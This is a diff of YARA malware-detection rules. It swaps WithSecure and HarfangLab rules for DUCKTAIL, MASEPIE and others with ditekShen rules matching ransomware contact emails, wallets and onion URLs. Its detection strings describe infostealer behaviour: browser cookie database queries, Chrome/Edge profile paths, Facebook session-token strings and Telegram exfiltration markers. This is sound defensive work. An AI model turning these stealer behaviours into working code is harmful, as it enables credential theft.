+		quality = 71
+		tags = ""
 
 	strings:
-		$a = "Azbi3l1xIgcRzTsOHopgrwUdJUMWpOFt" ascii
-		$b = "PID : " wide
-		$c = "ExitCode : " wide
-		$d = "1: " wide
-		$e = "2: " wide
+		$s1 = "eviluser@tutanota.com" ascii wide nocase
+		$s2 = "evilpr0ton@protonmail.com" ascii wide nocase
 
 	condition:
-		pe.is_dll( ) and filesize > 50000 and filesize < 500000 and 4 of them
+		any of them
 }
-
-rule WITHSECURELABS_Ducktail_Nativeaot : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Alkhal
 {
 	meta:
-		description = "Detects NativeAOT variants of DUCKTAIL malware"
-		author = "WithSecure"
-		id = "1961d3e1-987b-588b-bfc2-8239797cd049"
-		date = "2022-11-17"
-		modified = "2022-11-22"
-		reference = "https://labs.withsecure.com/publications/ducktail_returns"
-		source_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/DUCKTAIL/ducktail_nativeaot.yara#L2-L22"
-		license_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/LICENSE"
-		logic_hash = "976b28ac45e5a13d4ce900b857e6bd3afc82b65b0235791fd698b762287cd60e"
+		description = "Detects files referencing identities associated with AlKhal ransomware"
+		author = "ditekShen"
+		id = "32e14a6e-fc2e-5c0a-b8e3-33e219923d90"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L365-L374"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "bd2d66a9cd33ab15b451158cd6c0e6579735653611ee2e6c8045a5807091938d"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		version = "1.0"
-		hash1 = "b043e4639f89459cae85161e6fbf73b22470979e"
-		hash2 = "073b092bf949c31628ee20f7458067bbb05fda3a"
-		hash3 = "d1f6b5f9718a2fe9eaac0c1a627228d3f3b86f87"
+		quality = 71
+		tags = ""
+
+	strings:
+		$s1 = "alkhal@tutanota.com" ascii wide nocase
+		$s2 = "cyrilga@tutanota.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 15MB and ( pe.section_index ( ".managed" ) >= 0 or pe.exports ( "DotNetRuntimeDebugHeader" ) ) and pe.exports ( "SendFile" ) and pe.exports ( "Start" ) and pe.exports ( "Open" )
+		any of them
 }
-rule WITHSECURELABS_Ducktail_Artifacts : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_DECAF
 {
 	meta:
-		description = "Detects artifacts found in files associated to DUCKTAIL malware"
-		author = "WithSecure"
-		id = "937c9688-b74f-5e02-838f-ab6757a8d2a1"
-		date = "2022-07-18"
-		modified = "2022-07-26"
-		reference = "https://labs.withsecure.com/publications/ducktail"
-		source_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/DUCKTAIL/ducktail_artifacts.yar#L1-L20"
-		license_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/LICENSE"
-		logic_hash = "1daa5e654058c802826b6a306b5bfc9d0c05c4ee54607e94e618a8d409ce74d9"
+		description = "Detects files referencing identities associated with DECAF ransomware"
+		author = "ditekShen"
+		id = "24422015-56f3-503e-a902-0183eb601b22"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L376-L408"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "8fca3a6564cd11e625b65e7f0f278b79678368dd0c77440e9f8d46035e0c3426"
 		score = 75
-		quality = 50
-		tags = "FILE"
-		version = "1.0"
-		hash1 = "3dbd9e1c3d0fd6358d4adcba04fdfc0b6e8acc49"
-		hash2 = "9370243589327b458486e3f7637779c2a96b4250"
-		hash3 = "b98170b18b906aee771dbd4dbd31e5963a90a50e"
+		quality = 73
+		tags = ""
 
 	strings:
-		$pdb_path_1 = /[a-z]\:\\projects\\(viruttest|virot)\\/i nocase ascii
-		$pdb_path_2 = /[a-z]\:\\users\\ductai\\/i nocase ascii
-		$pdb_path_3 = "\\dataextractor.pdb" nocase ascii
-		$email = "ductai2308@gmail.com" wide ascii
+		$s1 = "22eb687475f2c5ca30b@protonmail.com" ascii wide nocase
+		$s2 = { 4d 49 49 42 43 67 4b 43 41 51 45 41 71 34 6b 31
+                48 64 62 31 54 48 72 7a 42 42 65 4f 31 38 34 6b
+                6e 43 62 42 4b 72 30 33 61 70 66 58 71 6c 4f 6b
+                53 64 74 48 53 4a 67 66 79 49 71 4a 50 47 78 6c
+                0a 2f 63 46 69 73 4a 6d 56 58 52 33 2f 74 34 65
+                39 46 62 4c 73 45 49 75 54 70 39 50 4a 54 63 69
+                6f 6d 48 66 72 35 43 67 43 51 7a 68 6e 41 5a 30
+                41 76 6a 47 42 61 57 50 36 4b 70 43 79 66 44 6e
+                73 0a 79 62 72 75 79 4b 71 79 67 61 57 70 5a 53
+                41 6e 7a 52 64 42 2b 54 41 6b 75 35 69 71 79 38
+                71 31 56 77 6e 4e 35 37 51 42 6c 74 72 6f 30 59
+                4a 5a 38 65 6e 4b 5a 52 54 6c 63 7a 6d 74 6a 65
+                4f 70 0a 42 2f 78 75 54 4f 75 44 6a 6d 55 53 4e
+                69 47 79 69 6a 57 42 56 66 59 6b 37 73 56 58 6c
+                2f 6c 51 38 74 61 58 72 33 36 78 50 57 68 4d 49
+                47 30 45 71 52 56 72 46 56 2b 63 61 76 53 37 5a
+                34 76 61 0a 79 58 6d 63 66 35 35 4e 6b 70 4d 47
+                4b 4b 59 38 75 71 76 77 62 34 61 4c 49 4b 61 62
+                65 6b 32 6e 55 57 42 67 4e 67 53 4f 74 71 42 4c
+                4c 4c 32 41 32 62 59 2f 35 73 30 47 4a 2f 56 56
+                2b 45 6d 49 0a 58 37 2f 7a 49 2b 46 63 65 55 2b
+                64 63 4e 58 2f 69 72 30 75 6a 50 34 79 73 34 6d
+                2f 6a 6a 5a 44 34 77 49 44 41 51 41 42 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		any of them
 }
-rule WITHSECURELABS_Ducktail_Dotnet_Core_Infostealer : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Babuk
 {
 	meta:
-		description = "Detects DUCKTAIL malware written in .NET Core"
-		author = "WithSecure"
-		id = "22eef7ce-9e11-55ec-9f0b-00a6776f8eee"
-		date = "2022-07-18"
-		modified = "2022-07-25"
-		reference = "https://labs.withsecure.com/publications/ducktail"
-		source_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/DUCKTAIL/ducktail_dotnet_core_infostealer.yar#L1-L103"
-		license_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/LICENSE"
-		logic_hash = "81b4da5860894397e9cd416e451c3098f8560407cd79f070f8edd5a3ba91512a"
+		description = "Detects files referencing identities associated with Babuk ransomware"
+		author = "ditekShen"
+		id = "139cea69-9661-5cb7-bf74-a14e3556c759"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L410-L426"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "129b1364bb59423aab1f5f67a4c2d2a76a9c4f55aa6aa1e59bcebc717a14ee19"
 		score = 75
-		quality = 50
-		tags = "FILE"
-		version = "1.0"
-		hash1 = "b260f3857990e11fa267d3f1cad4c9bed59a9d4b"
-		hash2 = "db74863c01817bf4eba39cd8a0ebbce9bda85a37"
-		hash3 = "3a4b395301f61b7e6afc0ab27dc02331455181d0"
+		quality = 61
+		tags = ""
 
 	strings:
-		$dotnet_core_bundle_signature = { 8B 12 02 B9 6A 61 20 38 72 7B 93 02 14 D7 A0 32 13 F5 B9 E6 EF AE 33 18 EE 3B 2D CE 24 B3 6A AE }
-		$fb_str_1 = "c_user" wide ascii
-		$fb_str_2 = "https://business.facebook.com/security/twofactor/reauth/enter" wide ascii
-		$fb_str_3 = "https://business.facebook.com/security/twofactor/reauth" wide ascii
-		$fb_str_4 = "mbasic.facebook.com" wide ascii
-		$fb_str_5 = "DTSGInitData\",[],{\"token\":\"" wide ascii
-		$fb_str_6 = "www.facebook.com" wide ascii
-		$fb_str_7 = "m.facebook.com" wide ascii
-		$fb_str_8 = "business.facebook.com" wide ascii
-		$fb_str_9 = "approvals_code=" wide ascii
-		$fb_str_10 = "c_user=" wide ascii
-		$fb_str_11 = "&__a=1&__comet_req=0&fb_dtsg=" wide ascii
-		$fb_str_12 = "&__jssesw=1" wide ascii
-		$fb_str_13 = "approvals_code=" wide ascii
-		$fb_str_14 = "<BmLinks>k__BackingField" wide ascii
-		$fb_str_15 = "set_FbCookies" wide ascii
-		$fb_str_16 = "<AdsAccount>k__BackingField" wide ascii
-		$fb_str_17 = "GetAllFbData" wide ascii
-		$fb_str_18 = "get_account_id" wide ascii
-		$fb_str_19 = "set_BmLinks" wide ascii
-		$fb_str_20 = "GetBmLink" wide ascii
-		$fb_str_21 = "GetBm" wide ascii
-		$fb_str_22 = "ExtractUserId" wide ascii
-		$fb_str_23 = "set_Bussinesses" wide ascii
-		$fb_str_24 = "set_FbData" wide ascii
-		$fb_str_25 = "get_Nguong" wide ascii
-		$fb_str_26 = "ResetCookie" wide ascii
-		$fb_str_27 = "set_UserId" wide ascii
-		$fb_str_28 = "<Nguong>k__BackingField" wide ascii
-		$fb_str_29 = "get_UserId" wide ascii
-		$fb_str_30 = "set_Nguong" wide ascii
-		$fb_str_31 = "AdsBusiness" wide ascii
-		$fb_str_32 = "<FbData>k__BackingField" wide ascii
-		$fb_str_33 = "<FbCookies>k__BackingField" wide ascii
-		$fb_str_34 = "<invite_link>k__BackingField" wide ascii
-		$fb_str_35 = "get_FbData" wide ascii
-		$fb_str_36 = "get_invite_link" wide ascii
-		$fb_str_37 = "get_Bussinesses" wide ascii
-		$fb_str_38 = "GetNguong" wide ascii
-		$fb_str_39 = "set_AdsAccount" wide ascii
-		$fb_str_40 = "set_invite_link" wide ascii
-		$fb_str_41 = "set_AllCookies" wide ascii
-		$fb_str_42 = "get_business" wide ascii
-		$fb_str_43 = "set_business" wide ascii
-		$fb_str_44 = "<Bussinesses>k__BackingField" wide ascii
-		$fb_str_45 = "GetAdsFromToken" wide ascii
-		$fb_str_46 = "get_AdsAccount" wide ascii
-		$fb_str_47 = "get_BmLinks" wide ascii
-		$fb_str_48 = "FbDataScanner" wide ascii
-		$exfil_str_1 = "telegramBotClient_OnUpdate" wide ascii
-		$exfil_str_2 = "telegramHandler" wide ascii
-		$exfil_str_3 = "ZipArchive" wide ascii
-		$exfil_str_4 = "KillItSame" wide ascii
-		$exfil_str_5 = "1.txt" wide ascii
-		$exfil_str_6 = ".zip" wide ascii
-		$exfil_str_7 = "2.txt" wide ascii
-		$browser_str_1 = "GetCookies" wide ascii
-		$browser_str_2 = "get_AllCookies" wide ascii
-		$browser_str_3 = "ChromiumBrowser" wide ascii
-		$browser_str_4 = "myBrowsers" wide ascii
-		$browser_str_5 = "get_CookiePath" wide ascii
-		$browser_str_6 = "ScanFirefox" wide ascii
-		$browser_str_7 = "get_FbCookies" wide ascii
-		$browser_str_8 = "ScanChomium" wide ascii
-		$browser_str_9 = "BrowserScanner" wide ascii
-		$browser_str_10 = "ScanChronium" wide ascii
-		$browser_str_11 = "CookieData" wide ascii
-		$browser_str_12 = "listBrowser" wide ascii
-		$browser_str_13 = "BrowserCookie" wide ascii
-		$browser_str_14 = "<Cookies>k__BackingField" wide ascii
-		$browser_str_15 = "AddCookie" wide ascii
-		$browser_str_16 = "set_CookiePath" wide ascii
-		$browser_str_17 = "Local State" wide ascii
-		$browser_str_18 = "select name, path, expires_utc, is_secure, is_httponly, host_key, encrypted_value  from cookies" wide ascii
-		$browser_str_19 = "Google\\Chrome\\User Data" wide ascii
-		$browser_str_20 = "Microsoft\\Edge\\User Data" wide ascii
-		$browser_str_21 = "Cookies" wide ascii
-		$browser_str_22 = "encrypted_key\":\"" wide ascii
+		$s1 = "mitnickd@ctemplar.com" ascii wide nocase
+		$s2 = "zar8b@tuta.io" ascii wide nocase
+		$s3 = "recover300dollars@gmail.com" ascii wide nocase
+		$s4 = "support.3330@gmail.com" ascii wide nocase
+		$s5 = "decryptdelta@gmail.com" ascii wide nocase
+		$s6 = "pyotrmaksim@gmail.com" ascii wide nocase
+		$s7 = "retrievedata300@gmail.com" ascii wide nocase
+		$s8 = "3JG36KY6abZTnHBdQCon1hheC3Wa2bdyqs" ascii wide
+		$s9 = "46zdZVRjm9XJhdjpipwtYDY51NKbD74bfEffxmbqPjwH6efTYrtvbU5Et4AKCre9MeiqtiR51Lvg2X8dXv1tP7nxLaEHKKQ" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $dotnet_core_bundle_signature and ( ( 7 of ( $fb_str_* ) and ( 7 of ( $browser_str_* ) or 3 of ( $exfil_str_* ) ) ) or ( 7 of ( $browser_str_* ) and 3 of ( $exfil_str_* ) ) )
+		any of them
 }
-
-rule WITHSECURELABS_SILKLOADER
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Rapid
 {
 	meta:
-		description = "Detects SILKLOADER samples"
-		author = "WithSecure"
-		id = "bb8a543e-fdbf-5be1-901e-3e2a9965fd62"
-		date = "2023-03-15"
-		modified = "2023-03-15"
-		reference = "https://labs.withsecure.com/publications/silkloader"
-		source_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/SILKLOADER/silkloader.yar#L2-L20"
-		license_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/LICENSE"
-		logic_hash = "48aa249ea78e5a3bfe9934fd0dfa26b79f9e6cbe1e5b1426b84f8d8a3d77d742"
+		description = "Detects files referencing identities associated with Rapid ransomware"
+		author = "ditekShen"
+		id = "a1c6f3c0-2fec-5d96-9965-8129a843ae90"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L428-L436"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "ea82a3fcb1d836e1c250e9a576064e1babdb82b4970555260af2eb68726cfd16"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = ""
-		version = "1.0"
-		hash1 = "c83ac6dc96febd49c7c558e8cf85dd8bcb3a84fdc78b3ba72ebf681566dc1865"
-		hash2 = "e4dadabd1cee7215ff6e31e01f6b0dd820851685836592a14f982f2c7972fc25"
-		hash3 = "d77a59e6ba3a8f3c000a8a8955af77d2898f220f7bf3c0968bf0d7c8ac25a5ad"
 
 	strings:
-		$str1 = {5400520041004e005300460045005200}
-		$str2 = {760062006300630073006200}
+		$s1 = "jimmyneytron@tuta.io" ascii wide nocase
 
 	condition:
-		pe.is_pe and pe.characteristics & pe.DLL and all of them
+		any of them
 }
-/*
- * YARA Rule Set
- * Repository Name: HarfangLab
- * Repository: https://github.com/HarfangLab/iocs
- * Retrieval Date: 2025-06-08
- * Git Commit: 1df815f4210f1d26151026cdd9658dbfc262b019
- * Number of Rules: 23
- * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
- *
- *
- * LICENSE
- *
- * NO LICENSE SET
- */
-rule HARFANGLAB_Masepie_Campaign_Htmlstarter : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Satana
 {
 	meta:
-		description = "Detect Malicious Web page HTML file from CERT-UA#8399"
-		author = "HarfangLab"
-		id = "0cca485c-7941-5760-8c24-d993dcbf376d"
-		date = "2024-01-24"
-		modified = "2025-04-16"
-		reference = "TRR240101;https://cert.gov.ua/article/6276894"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L1-L16"
-		license_url = "N/A"
-		hash = "628bc9f4aa71a015ec415d5d7d8cb168359886a231e17ecac2e5664760ee8eba"
-		logic_hash = "d131372c6ad01ae77e5630bae0c0a04ce311718eb1bcf423e6575f3b0ecdba5d"
+		description = "Detects files referencing identities associated with Satana ransomware"
+		author = "ditekShen"
+		id = "a362d4ca-d475-5392-a3ac-45337425d8e7"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L438-L447"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "6d82e2497044518cee1b56da85f1ad6ac7934eec9ca68501932d55add4236d45"
 		score = 75
-		quality = 80
-		tags = "FILE"
-		context = "file"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "<link rel=\"stylesheet\" href=\"a.css\">" ascii wide fullword
-		$s2 = "src=\".\\Capture" ascii wide
+		$s1 = "adamadam@ausi.com" ascii wide nocase
+		$s2 = "XsrR2he2Z8un5ysGWnJ1wveZRPRS96XEoX" ascii wide
 
 	condition:
-		filesize > 600 and filesize < 5KB and ( all of them )
+		any of them
 }
-rule HARFANGLAB_Masepie_Campaign_Webdavlnk : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Zeppelin
 {
 	meta:
-		description = "Detect Malicious LNK from CERT-UA#8399"
-		author = "HarfangLab"
-		id = "de7fd592-e733-52d0-af9b-55adf37eaf74"
-		date = "2024-01-24"
-		modified = "2025-04-16"
-		reference = "TRR240101;https://cert.gov.ua/article/6276894"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L17-L39"
-		license_url = "N/A"
-		hash = "19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc"
-		logic_hash = "26075e47b54404c55f4ca5eb757efa2b1711d919de0ffbfbdf6935e2e4dd3f3d"
+		description = "Detects files referencing identities associated with Zeppelin ransomware"
+		author = "ditekShen"
+		id = "f3bbfcd0-c66c-589e-ae04-904314d6a869"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L449-L462"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "66dd92423cfac32de4bea95ad0c9594cb449dc897cc6315d782c1db6de7dc5b1"
 		score = 75
-		quality = 80
-		tags = "FILE"
-		context = "file"
+		quality = 63
+		tags = ""
 
 	strings:
-		$a1 = "[system.Diagnostics.Process]::Start('msedge','http" wide nocase fullword
-		$a2 = "\\Microsoft\\Edge\\Application\\msedge.exe" wide nocase fullword
-		$a3 = "powershell.exe" ascii wide fullword
-		$s1 = "win-j5ggokh35ap" ascii fullword
-		$s2 = "desktop-q0f4sik" ascii fullword
+		$s1 = "kd8eby0@inboxhub.net" ascii wide nocase
+		$s2 = "kd8eby0@onionmail.org" ascii wide nocase
+		$s3 = "kd8eby0@nuke.africa" ascii wide nocase
+		$s4 = "uspex1@cock.li" ascii wide nocase
+		$s5 = "uspex2@cock.li" ascii wide nocase
+		$s6 = "China.Helper@aol.com" ascii wide nocase
 
 	condition:
-		filesize > 1200 and filesize < 5KB and ( uint16be( 0 ) == 0x4c00 ) and ( ( all of ( $a* ) ) or ( any of ( $s* ) ) )
+		any of them
 }
-rule HARFANGLAB_Masepie_Campaign_Masepie : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_STOP
 {
 	meta:
-		description = "Detect MASEPIE from CERT-UA#8399"
-		author = "HarfangLab"
-		id = "f0a034fa-38d4-5c54-b865-f830f85e245e"
-		date = "2024-01-24"
-		modified = "2025-04-16"
-		reference = "TRR240101;https://cert.gov.ua/article/6276894"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L40-L60"
-		license_url = "N/A"
-		hash = "18f891a3737bb53cd1ab451e2140654a376a43b2d75f6695f3133d47a41952b6"
-		logic_hash = "02da8119267978e63e3ee5ecdefb52285718f8875ec64d320f2752460c05588d"
+		description = "Detects files referencing identities associated with STOP ransomware"
+		author = "ditekShen"
+		id = "b2279a7f-a187-5a44-bf1f-87c21b3ffa4f"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L464-L480"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "f0d902edbcbe8ff8f3a751b649554499933b06471920c86a9eea3de23890b4bc"
 		score = 75
-		quality = 78
-		tags = "FILE"
-		context = "file"
+		quality = 57
+		tags = ""
 
 	strings:
-		$t1 = "Try it againg" ascii wide fullword
-		$t2 = "{user}{SEPARATOR}{k}" ascii wide fullword
-		$t3 = "Error transporting file" ascii wide fullword
-		$t4 = "check-ok" ascii wide fullword
-		$a1 = ".join(random.SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(16))" ascii wide fullword
-		$a2 = "dec_file_mes(mes, key)" ascii wide fullword
-		$a3 = "os.popen('whoami').read()" ascii wide fullword
+		$s1 = "gorentos@bitmessage.ch" ascii wide nocase
+		$s2 = "gorentos2@firemail.cc" ascii wide nocase
+		$s3 = "manager@mailtemp.ch" ascii wide nocase
+		$s4 = "helprestoremanager@airmail.cc" ascii wide nocase
+		$s5 = "supporthelp@airmail.cc" ascii wide nocase
+		$s6 = "managerhelper@airmail.cc" ascii wide nocase
+		$s7 = "helpteam@mail.ch" ascii wide nocase
+		$s8 = "helpmanager@airmail.cc" ascii wide nocase
+		$s9 = "support@sysmail.ch" ascii wide nocase
 
 	condition:
-		filesize > 2KB and filesize < 15MB and ( 4 of them )
+		any of them
 }
-rule HARFANGLAB_Masepie_Campaign_Oceanmap : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Diavol
 {
 	meta:
-		description = "Detect OCEANMAP from CERT-UA#8399"
-		author = "HarfangLab"
-		id = "7dcbce01-ab91-56ae-8789-e2e25ba1bf8c"
-		date = "2024-01-24"
-		modified = "2024-01-31"
-		reference = "TRR240101;https://cert.gov.ua/article/6276894"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L61-L95"
-		license_url = "N/A"
-		hash = "24fd571600dcc00bf2bb8577c7e4fd67275f7d19d852b909395bebcbb1274e04"
-		logic_hash = "5fe244025f49358b4285e1272489378a46363ae915881dece26691d971aa93f3"
+		description = "Detects files referencing identities associated with Diavol ransomware"
+		author = "ditekShen"
+		id = "ea499318-ed5b-5597-8f9f-4ece7942cf4b"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L482-L491"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "c72f4d7854f7ba813c4872d47aad69edb8c2927f380b9213ced1aca52454eee5"
 		score = 75
-		quality = 78
-		tags = "FILE"
-		context = "file"
+		quality = 71
+		tags = ""
 
 	strings:
-		$dotNet = ".NETFramework,Version" ascii fullword
-		$a1 = "$ SELECT INBOX.Drafts" wide fullword
-		$a2 = "$ SELECT Drafts" wide fullword
-		$a3 = "$ UID SEARCH subject \"" wide fullword
-		$a4 = "$ APPEND INBOX {" wide fullword
-		$a5 = "+FLAGS (\\Deleted)" wide fullword
-		$a6 = "$ EXPUNGE" wide fullword
-		$a7 = "BODY.PEEK[text]" wide fullword
-		$t1 = "change_time" ascii fullword
-		$t2 = "ReplaceBytes" ascii fullword
-		$t3 = "fcreds" ascii fullword
-		$t4 = "screds" ascii fullword
-		$t5 = "r_creds" ascii fullword
-		$t6 = "comp_id" ascii fullword
-		$t7 = "changesecond" wide fullword
-		$t8 = "taskkill /F /PID" wide fullword
-		$t9 = "cmd.exe" wide fullword
+		$s1 = "/noino.5fws6uqv5byttg2r//:sptth" ascii wide nocase
+		$s2 = "https://r2gttyb5vqu6swf5.onion/" ascii wide nocase
 
 	condition:
-		filesize > 8KB and filesize < 100KB and ( uint16be( 0 ) == 0x4D5A ) and $dotNet and ( 3 of ( $a* ) ) and ( 2 of ( $t* ) )
+		any of them
 }
-rule HARFANGLAB_Allasenhamaycampaign_Executorloader
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Chaos
 {
 	meta:
-		description = "Detects Delphi ExecutorLoader DLLs and executables."
-		author = "HarfangLab"
-		id = "0a09414d-cd86-54a4-99e4-121a7df7624b"
-		date = "2024-05-28"
-		modified = "2025-04-16"
-		reference = "TRR240501"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L96-L114"
-		license_url = "N/A"
-		logic_hash = "61aa0bf180574856e57d0b26442bfa6f4b1e25844611d6eadaed529e1bb86625"
+		description = "Detects files referencing identities associated with Chaos ransomware"
+		author = "ditekShen"
+		id = "18476655-1468-569e-b518-ebeaf289fbd6"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L493-L511"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "6e8dce1622dbccca6aa15040b49fc9ea05ec7192f8a79409fd7414690102d09a"
 		score = 75
-		quality = 55
+		quality = 67
 		tags = ""
-		context = "file,memory"
 
 	strings:
-		$delphi = "Embarcadero Delphi" ascii fullword
-		$s1 = "\\SysWOW64\\mshta.exe" wide fullword
-		$s2 = "\\System32\\mshta.exe" wide fullword
-		$s3 = "RcDll" wide fullword
-		$default1 = "Default_" wide fullword
-		$default2 = "Default~" wide fullword
+		$s1 = "anenomous31@gmail.com" ascii wide nocase
+		$s2 = "daengsocietyteam@gmail.com" ascii wide nocase
+		$s3 = "RansHelp@tutanota.com" ascii wide nocase
+		$s4 = "18vhBpgPhZrjJkbuT2ZyUXAnJavaJcTwEd" ascii wide
+		$s5 = "bc1qlnzcep4l4ac0ttdrq7awxev9ehu465f2vpt9x0" ascii wide
+		$s6 = "8AFtPnreZp28xoetUyKiQvVtwrov9PtEbMyvczdNZpBN45EUbEsrE8xYVp4NNqPrtxNjQwn3PbW3FG16EPYcPpKzMU78xN6" ascii wide
+		$s7 = "bc1qu6tharwawwny28z9fj6nrxg5cqftaep9ap6z2v" ascii wide
+		$s8 = "bambolina2021@virgilio.it" ascii wide nocase
+		$s9 = "1EoyuvcXdAQQvStkoJZ38vdGm84StD7wjm" ascii wide
+		$s10 = "1G395PJs8ciqvXPZEYb1LfUGPix9h9n3oQ" ascii wide
 
 	condition:
-		$delphi and all of ( $s* ) and any of ( $default* )
+		any of them
 }
-rule HARFANGLAB_Allasenhamaycampaign_Allasenha
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Maze
 {
 	meta:
-		description = "Detects AllaSenha banking trojan DLLs."
-		author = "HarfangLab"
-		id = "787c4e66-2053-5f14-a52e-6b0415700e8c"
-		date = "2024-05-28"
-		modified = "2025-04-16"
-		reference = "TRR240501"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L115-L137"
-		license_url = "N/A"
-		logic_hash = "affe75ade6c8d9eeba00006f78678a48b1cfc5ffa9f9675fdea6ffd6cb3a02bd"
+		description = "Detects files referencing identities associated with Maze ransomware"
+		author = "ditekShen"
+		id = "7cc11912-e5d2-5477-ab9b-0c470bb5e1d6"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L513-L521"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "46070d46c502837e5fb87d0fb75244a1a21e90b4e0ce4b73c408b8dc67fe1bcb"
 		score = 75
-		quality = 80
+		quality = 73
 		tags = ""
-		context = "file,memory"
 
 	strings:
-		$a1 = "<|NOSenha|>" wide fullword
-		$a2 = "<|SENHA|>QrCode: " wide fullword
-		$a3 = "<|SENHA|>Senha 6 : " wide fullword
